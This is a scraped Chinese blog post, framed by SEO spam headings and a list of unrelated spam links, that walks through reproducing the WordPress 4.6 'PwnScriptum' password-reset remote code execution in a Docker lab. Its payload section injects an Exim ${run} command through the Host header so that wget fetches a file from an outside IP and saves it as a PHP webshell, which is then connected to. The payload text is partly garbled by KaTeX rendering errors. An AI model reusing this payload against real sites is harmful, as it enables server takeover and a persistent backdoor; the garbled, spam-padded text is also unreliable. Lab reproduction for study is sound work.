当前位置: 首页 > news >正文

app开发报价单seo关键词优化推广报价表

app开发报价单,seo关键词优化推广报价表,互联网培训机构排名前十,wordpress sitemaps文章目录 一、搭建环境二、漏洞复现1.抓包2.准备payload3.发送payload4.检查是否上传成功5.连接payload 国外的:Wordpress,Drupal,Joomla,这是国外最流行的3大CMS。国内则是DedeCMS和帝国,PHPCMS等。 国内的CMS会追求大…

文章目录

  • 一、搭建环境
  • 二、漏洞复现
    • 1.抓包
    • 2.准备payload
    • 3.发送payload
    • 4.检查是否上传成功
    • 5.连接payload

国外的:Wordpress,Drupal,Joomla,这是国外最流行的3大CMS。国内则是DedeCMS和帝国,PHPCMS等。
国内的CMS会追求大而全,而国外的CMS更注重生态,更注重友好的接口,更多的功能留给第三方开发插件来实现。
推荐几个比较新的:ProcessWire,OctoberCMS,CraftCMS

一、搭建环境

进入wordpress里的pwnscriptum里运行docker
docker-compose up -d 拉取环境
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

扫描一下wordpress的版本,只有4.6及以下的版本才有这个漏洞
wpscan --url http://192.168.25.128:8080/
在这里插入图片描述

二、漏洞复现

1.抓包

点击忘记密码,输入刚才创建的用户名或者电子邮箱
在这里插入图片描述

开启burp抓包拦截
在这里插入图片描述

2.准备payload

Host: aa(any -froot@localhost -be KaTeX parse error: Expected '}', got 'EOF' at end of input: {run{{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}usr{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}bin{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}wget{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}--output-docum…{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}var{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}www{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}html{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}wutiangui.php{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}192.168.155.2:…{substr{0}{1}{$spool_directory}}payload.txt}} null)
这句话的意思是从192.168.155.2 这个IP地址上下载文件payload.txt 到靶机上的var/www/html目录下的wutiangui.php文件里

3.发送payload

通过BP把一句话木马输入到靶机上,测试一下是否可以通过BP写入成功
在这里插入图片描述

4.检查是否上传成功

在这里插入图片描述

网页回显没报错,应该成功了
执行后进入以下目录查看
/var/lib/docker/overlay2/b0766f51462cbcb76c2f483c439ab74adce69f6b1f5325b69f67ef889ee3b21e/merged/var/www/html
在这里插入图片描述

可以发现生成wutiangui.php
在这里插入图片描述

5.连接payload

用御剑连接成功
在这里插入图片描述
在这里插入图片描述

http://www.hrbkazy.com/news/10401.html

相关文章:

  • 免费的代码分享网站企业管理培训公司排行榜
  • 大学英文网站建设方案东莞网站定制开发
  • 新疆做网站公司自己建网站怎么建
  • 广州做网站公司培训关键词seo如何优化
  • 厦门网站建设qs-net.cn宁波seo整体优化
  • 国内免备案网站空间百度网盘官网登录首页
  • 杭州做网站哪个公司好平台运营推广
  • 舟山网站建设有哪些真人seo点击平台
  • javascript作品网站常见的推广平台有哪些
  • 网站建设哪里实惠个人博客网页设计
  • wordpress 获取tag名seo简单速排名软件
  • 网站直接访问北京百度搜索优化
  • 那个网站做的系统最好抖音怎么推广引流
  • 网站开发的规格描述网上商城网站开发
  • 政府网站比较手机app推广平台
  • 九江网站建设推广企业网站制作
  • 五金批发网站怎么做百度收录查询方法
  • 常州个人网站建设做网络推广
  • 做网站虚拟主机淘宝seo具体优化方法
  • 怎么制作网站获取他人ip事件营销的概念
  • 云南网站制作一条龙全包百度上海分公司地址
  • 软件定制开发如何报价seo兼职
  • 禹城网站建设软文范文大全
  • 深圳做公司网站的公司软文广告属于什么营销
  • 怎么做钓鱼网站吗手机360优化大师官网
  • 网站开发wbs分解案例seo自动排名软件
  • 卫计委社会信用体系建设网站免费发seo外链平台
  • 免费个人网站建设报价新营销模式有哪些
  • 做h5页面的网站有哪些企业培训公司有哪些
  • 济南网站建设 联系小七怎么被百度收录